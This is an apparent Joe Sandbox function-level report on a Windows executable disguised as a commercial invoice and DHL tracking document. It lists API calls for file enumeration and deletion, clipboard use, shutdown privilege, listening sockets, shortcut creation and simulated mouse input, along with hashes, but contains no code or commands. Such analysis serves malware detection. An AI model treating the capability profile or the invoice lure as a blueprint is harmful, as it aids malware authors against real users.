FindClose.KERNEL32(00000000), ref: 0047977F
FindClose.KERNEL32(00000000), ref: 0047978F

Strings

*.*, xrefs: 004796F5

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: b2bc96c289f416ca38797849f78142382af58d5d1abd49691628c6991f17aa8e
Instruction ID: d4aaf40869890fa9a321a3e40125cc3d44fdb7a38802f5ebe86ad51efc8d8379
Opcode Fuzzy Hash: b2bc96c289f416ca38797849f78142382af58d5d1abd49691628c6991f17aa8e
Instruction Fuzzy Hash: 8C31A432541219AADB14EFB5DC49EDF77AC9F09320F1081A7E819E2190EB38DD448A6C

Function 0047979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 004797BE
FindNextFileW.KERNEL32(00000000,?), ref: 00479819
FindClose.KERNEL32(00000000), ref: 00479824
FindFirstFileW.KERNEL32(*.*,?), ref: 00479840
SetCurrentDirectoryW.KERNEL32(?), ref: 00479890
SetCurrentDirectoryW.KERNEL32(004C6B7C), ref: 004798AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 004798B8
FindClose.KERNEL32(00000000), ref: 004798C5
FindClose.KERNEL32(00000000), ref: 004798D5

Part of subcall function 0046DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0046DB00

Strings

*.*, xrefs: 0047983B

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 08009f9506173d6a8c255edc86dcc0ecfda648b1141ac077244459e378de50eb
Instruction ID: 495e4a146dab6e58c30566e9c8dfa1d6dcbdd1e1662f98abe0714f5f10764809
Opcode Fuzzy Hash: 08009f9506173d6a8c255edc86dcc0ecfda648b1141ac077244459e378de50eb
Instruction Fuzzy Hash: 0831C5315406196ADF10EFB5EC48EDF77AC9F06324F1581ABE818A22D0DB38DD498A2D

Function 00478195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00478257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00478267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00478273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00478310
SetCurrentDirectoryW.KERNEL32(?), ref: 00478324
SetCurrentDirectoryW.KERNEL32(?), ref: 00478356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0047838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00478395

Strings

*.*, xrefs: 0047839B

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 0a5646b9a09b1b589cea59cdf34af19873cf5b148a597532c8212f33060f7762
Instruction ID: ec0bd870f80bf12659f63383d377d20427defd451f36f299c09526282445d03b
Opcode Fuzzy Hash: 0a5646b9a09b1b589cea59cdf34af19873cf5b148a597532c8212f33060f7762
Instruction Fuzzy Hash: 06619C725043059FC710EF65C88499FB3E8FF89318F04896EF98993251EB39E945CB9A

Function 0046D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00403AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00403A97,?,?,00402E7F,?,?,?,00000000), ref: 00403AC2

Part of subcall function 0046E199: GetFileAttributesW.KERNEL32(?,0046CF95), ref: 0046E19A

FindFirstFileW.KERNEL32(?,?), ref: 0046D122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0046D1DD
MoveFileW.KERNEL32(?,?), ref: 0046D1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 0046D20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 0046D237

Part of subcall function 0046D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0046D21C,?,?), ref: 0046D2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 0046D253
FindClose.KERNEL32(00000000), ref: 0046D264

Strings

\*.*, xrefs: 0046D0CD, 0046D0D6, 0046D0EB

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 9b3e5d3e5ebe9d0059891b799ff9c4ea5bb52d40759b5a867d195dae7264e656
Instruction ID: da9c7cc7adf92f154ef8a75c6e12d1e766ca85ccd6e7875007feca1946bbe232
Opcode Fuzzy Hash: 9b3e5d3e5ebe9d0059891b799ff9c4ea5bb52d40759b5a867d195dae7264e656
Instruction Fuzzy Hash: 1B616F71D0110D9BCF05EBE1C9929EEB7B5AF55304F2481AAE40177292EB385F09CB6A

Function 0047ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0047ED91
EmptyClipboard.USER32 ref: 0047ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 0047EDAC
CloseClipboard.USER32 ref: 0047EEA3

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 8368addd3b95697cd8db1ee6ebe80e4f7274778474e2aaa1c6c53d436946e5f3
Instruction ID: 31251baaf32f351de7778df961977fd25441d5b15c2f72f92dc87ea2c7501845
Opcode Fuzzy Hash: 8368addd3b95697cd8db1ee6ebe80e4f7274778474e2aaa1c6c53d436946e5f3
Instruction Fuzzy Hash: 0541A335604511EFD320CF16D888B5A7BE5EF48318F14C5AAE4198B7A2C739EC41CB99

Function 0046E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 004616C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0046170D
Part of subcall function 004616C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0046173A
Part of subcall function 004616C3: GetLastError.KERNEL32 ref: 0046174A

ExitWindowsEx.USER32(?,00000000), ref: 0046E932

Strings

SeShutdownPrivilege, xrefs: 0046E902
, xrefs: 0046E920
@, xrefs: 0046E925
, xrefs: 0046E95C

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: b96c2a0a8a4f47adf6c99b3b0435ccfefb1d85958ad9cc69c56c726e97da3043
Instruction ID: eb52d6be280e91a3479a4c9c93090d33203d32185dd35972c73cc41e4985f576
Opcode Fuzzy Hash: b96c2a0a8a4f47adf6c99b3b0435ccfefb1d85958ad9cc69c56c726e97da3043
Instruction Fuzzy Hash: 7C012BB6710210ABFB5426B69C85FBB73AC9F14754F150437F802E21D1F5695C4481AE

Function 00481204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006), ref: 00481276
WSAGetLastError.WSOCK32 ref: 00481283
bind.WSOCK32(00000000,?,00000010), ref: 004812BA
WSAGetLastError.WSOCK32 ref: 004812C5
closesocket.WSOCK32(00000000), ref: 004812F4
listen.WSOCK32(00000000,00000005), ref: 00481303
WSAGetLastError.WSOCK32 ref: 0048130D
closesocket.WSOCK32(00000000), ref: 0048133C

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: dd98f8202aba79796c57e48e731577952ce9a50eaedf74f618eb9b9ddbb7e935
Instruction ID: ce28ad5cbf6225e9ea6dc1edb30dc527f953928a226dc1dda54e321c2215de1d
Opcode Fuzzy Hash: dd98f8202aba79796c57e48e731577952ce9a50eaedf74f618eb9b9ddbb7e935
Instruction Fuzzy Hash: 244193316001009FD710EF64C4C4B6ABBE5AF46318F1885AAD8569F3E6C775ED82CBE5

Function 0043B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043B9D4
_free.LIBCMT ref: 0043B9F8
_free.LIBCMT ref: 0043BB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,004A3700), ref: 0043BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,004D121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0043BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,004D1270,000000FF,?,0000003F,00000000,?), ref: 0043BC36
_free.LIBCMT ref: 0043BD4B

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 8e1ab56355fcd08fc52a6704cd795d14ff78001090b23ef68c0ae7f2c546dafc
Instruction ID: 71ae4cf4c1b7f42d99881a5d695aef9df234634b51de67786957360bd0beca24
Opcode Fuzzy Hash: 8e1ab56355fcd08fc52a6704cd795d14ff78001090b23ef68c0ae7f2c546dafc
Instruction Fuzzy Hash: 8EC13C71A04204AFDB20DF659C41BAA7BB8EF49310F1461AFEA94D7351DB389E41C7D8

Function 0046D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00403AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00403A97,?,?,00402E7F,?,?,?,00000000), ref: 00403AC2

Part of subcall function 0046E199: GetFileAttributesW.KERNEL32(?,0046CF95), ref: 0046E19A

FindFirstFileW.KERNEL32(?,?), ref: 0046D420
DeleteFileW.KERNEL32(?,?,?,?), ref: 0046D470
FindNextFileW.KERNEL32(00000000,00000010), ref: 0046D481
FindClose.KERNEL32(00000000), ref: 0046D498
FindClose.KERNEL32(00000000), ref: 0046D4A1

Strings

\*.*, xrefs: 0046D3F2

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 2df3a2f652ca3e994cc6e46c095a2a74bd65cf7c7df61fef8d8ee1dcfc12855c
Instruction ID: 53818abd8a2c914abd403a079adf620a96c10967e39a6483e3d81c850f0d193b
Opcode Fuzzy Hash: 2df3a2f652ca3e994cc6e46c095a2a74bd65cf7c7df61fef8d8ee1dcfc12855c
Instruction Fuzzy Hash: AD3170719183459BC304EF65C8919AF77A8AE91304F444E2FF4D1622D1EB38AE09CB6B

Function 0043E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0043E645

Strings

1#SNAN, xrefs: 0043F844
1#IND, xrefs: 0043F83D
1#INF, xrefs: 0043F852
1#QNAN, xrefs: 0043F84B

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: d36d642652a26de60f8180d17ea76e7c76dd79590718a29a24308ceaa12e0c42
Instruction ID: 11a7b4ff1fb68f5cb3f2ac3fe9731016f2f84ad1b05d2b742d6db5be86653bd3
Opcode Fuzzy Hash: d36d642652a26de60f8180d17ea76e7c76dd79590718a29a24308ceaa12e0c42
Instruction Fuzzy Hash: 94C26C71E056288FDB29CE29DD407EAB7B5EB48304F1451EBD80DE7281E778AE858F44

Function 0047648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 004764DC
CoInitialize.OLE32(00000000), ref: 00476639
CoCreateInstance.OLE32(0049FCF8,00000000,00000001,0049FB68,?), ref: 00476650
CoUninitialize.OLE32 ref: 004768D4

Strings

.lnk, xrefs: 004764BA, 00476524, 004765E0

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 9545a9c088e76c4e6b92dd9cb2970a3788846d1390ffe20bda88ac8e3d4e5368
Instruction ID: d0bb72b36f0c3be6f4d9adaa6407929a3aa0b63b58f28ffd8b4fd6195cfdec25
Opcode Fuzzy Hash: 9545a9c088e76c4e6b92dd9cb2970a3788846d1390ffe20bda88ac8e3d4e5368
Instruction Fuzzy Hash: A7D15C71508601AFC304EF25C881EABB7E9FF94308F11896EF5599B291DB34ED09CB96

Function 004822DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 004822E8

Part of subcall function 0047E4EC: GetWindowRect.USER32(?,?), ref: 0047E504

GetDesktopWindow.USER32 ref: 00482312
GetWindowRect.USER32(00000000), ref: 00482319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00482355
GetCursorPos.USER32(?), ref: 00482381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 004823DF

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: b0a4e48dd66b5824444019d0540c92ce7d017f65b45e459c58e2f5098004674c
Instruction ID: 05b831872450339c644785dfbb21d9b45ae3de71cb0cae446400f5b7fa18373c
Opcode Fuzzy Hash: b0a4e48dd66b5824444019d0540c92ce7d017f65b45e459c58e2f5098004674c
Instruction Fuzzy Hash: 2331CF72505315AFC720EF65C845A5BB7E9FF84314F00092EF98597281DB78EA08CB9A

Function 00479B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00409CB3: _wcslen.LIBCMT ref: 00409CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00479B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00479C8B

Part of subcall function 00473874: GetInputState.USER32 ref: 004738CB
Part of subcall function 00473874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00473966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00479BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00479C75

Strings

*.*, xrefs: 00479B5D

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 7acb0a154b22eca82d4832484c7c78dbe3164d6a534a943445dbf0d130a904f0
Instruction ID: e32824acfdb09f5b3aa58c1a709ce8cdac26dbe08683530e39126bd671aea28d
Opcode Fuzzy Hash: 7acb0a154b22eca82d4832484c7c78dbe3164d6a534a943445dbf0d130a904f0
Instruction Fuzzy Hash: 234186719042099FDF15DF65C989AEEBBB8FF05314F24806BE809A2291E7349E44CF69

Function 0041997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 00419BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00419BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 00419A4E
GetSysColor.USER32(0000000F), ref: 00419B23
SetBkColor.GDI32(?,00000000), ref: 00419B36

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: 008d7f4966374fd70fc10806bddab33b900210bcee92a512a1071b2935ce9feb
Instruction ID: e8bc8b2f7a0bb2fb347258d8ffc67998038f63e5322d7f54452ed9c4e97b1286
Opcode Fuzzy Hash: 008d7f4966374fd70fc10806bddab33b900210bcee92a512a1071b2935ce9feb
Instruction Fuzzy Hash: E0A12F70208444BEE7249A2DAC78DFB3A9DDF46355B14412FF802C6792C62D9D8AC27F

Function 00481806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0048304E: inet_addr.WSOCK32(?), ref: 0048307A
Part of subcall function 0048304E: _wcslen.LIBCMT ref: 0048309B

socket.WSOCK32(00000002,00000002,00000011), ref: 0048185D
WSAGetLastError.WSOCK32 ref: 00481884
bind.WSOCK32(00000000,?,00000010), ref: 004818DB
WSAGetLastError.WSOCK32 ref: 004818E6
closesocket.WSOCK32(00000000), ref: 00481915

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: fddb4916d305d9aa77e7ea3c76e7392278f2e167924f1c2a3f3dab574a5640fd
Instruction ID: 6c1146d80a6d47799e3eb1c02aaa38066deff44b86852a1e056cb773c88fe3f6
Opcode Fuzzy Hash: fddb4916d305d9aa77e7ea3c76e7392278f2e167924f1c2a3f3dab574a5640fd
Instruction Fuzzy Hash: 37519571A00200AFD710BF25C8C6F6A77E59B44718F0484AEF9066F3D3C779AD828BA5

Function 00491C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00491CC0
IsWindowEnabled.USER32 ref: 00491CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00491CDB
IsIconic.USER32 ref: 00491CE9
IsZoomed.USER32 ref: 00491CF7

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 5347e4da358eca34548c4d68295ac4be29339ef082366b830d4751c2b14d8c7b
Instruction ID: 46f85afb1d901da7ddbaad2f414343a11cdface8d7546eab0ffee271a72cceae
